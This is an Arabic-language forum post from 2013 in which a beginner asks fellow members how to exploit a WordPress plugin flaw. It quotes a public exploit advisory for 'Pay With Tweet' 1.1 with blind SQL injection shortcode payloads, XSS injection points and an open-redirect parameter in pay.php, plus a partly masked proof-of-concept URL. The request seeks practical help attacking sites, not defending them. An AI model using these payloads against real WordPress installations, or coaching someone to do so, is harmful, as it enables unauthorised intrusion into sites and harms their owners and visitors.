عرض مشاركة واحدة
قديم 02-15-2013, 12:33 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
Sh.Jalilo.Sh
 
الصورة الرمزية Sh.Jalilo.Sh
 

 

 
إحصائية العضو







Sh.Jalilo.Sh غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Sh.Jalilo.Sh is on a distinguished road

مطلوب مساعدة في استغلال ثغرة Wp !


الســــــــلآم عليــــــكم ورحمـــة الله
إخــــواني العنـــاكب المـــرجو مســاعدتي //
في إستغلال هــذه الثغـــرة / انـا لم أفــهم عليــها لآنــي مبتدأ.

اقتباس
# Exploit Title: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities
# Date: 01/06/2012

# Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugi...-tweet.1.1.zip

# Version: 1.1


1) Blind SQL Injection in shortcode:
Short code parameter 'id' is prone to blind sqli,

you need to be able to write a post/page to exploit this:


[paywithtweet id="1' AND 1=2"]
[paywithtweet id="1' AND 1=1"]


2) Multiple XSS in pay.php

http://target.com/wp-content/plugins...et.php/pay.php


After connecting to twitter:
?link=&22></input>[XSS]

After submitting the tweet:
?title=[XSS]&dl=[REDIRECT-TO-URL]%27)">[XSS]


The final download link will be replaced with [REDIRECT-TO-URL]


POC: pay.php?link=%22></input>***************(********.******)</script>&title=***************(********.******)</script>&dl=http://brindi.si%27">***************(********.******)</script>

وشكـــرا للجميـع



lshu]m td hsjyghg eyvm Wp !

التوقيع

http://www.qzal.net/01/2013-01/13607005701.jpg

ليس كل من استخدم برامج التصميم أصبح مصمم
ليس كل من ركب صفحة أصبح مطور
ليس كل من كتب كود أصبح مبرمج
ليس كل من اخذ سيرفر أصبح مستضيف
ليس كل من ركب هاك اصبح دعم فني
و لكن كل من تواضع لله أصبح محترف

Sahara Team | 2012-2013

 

   

رد مع اقتباس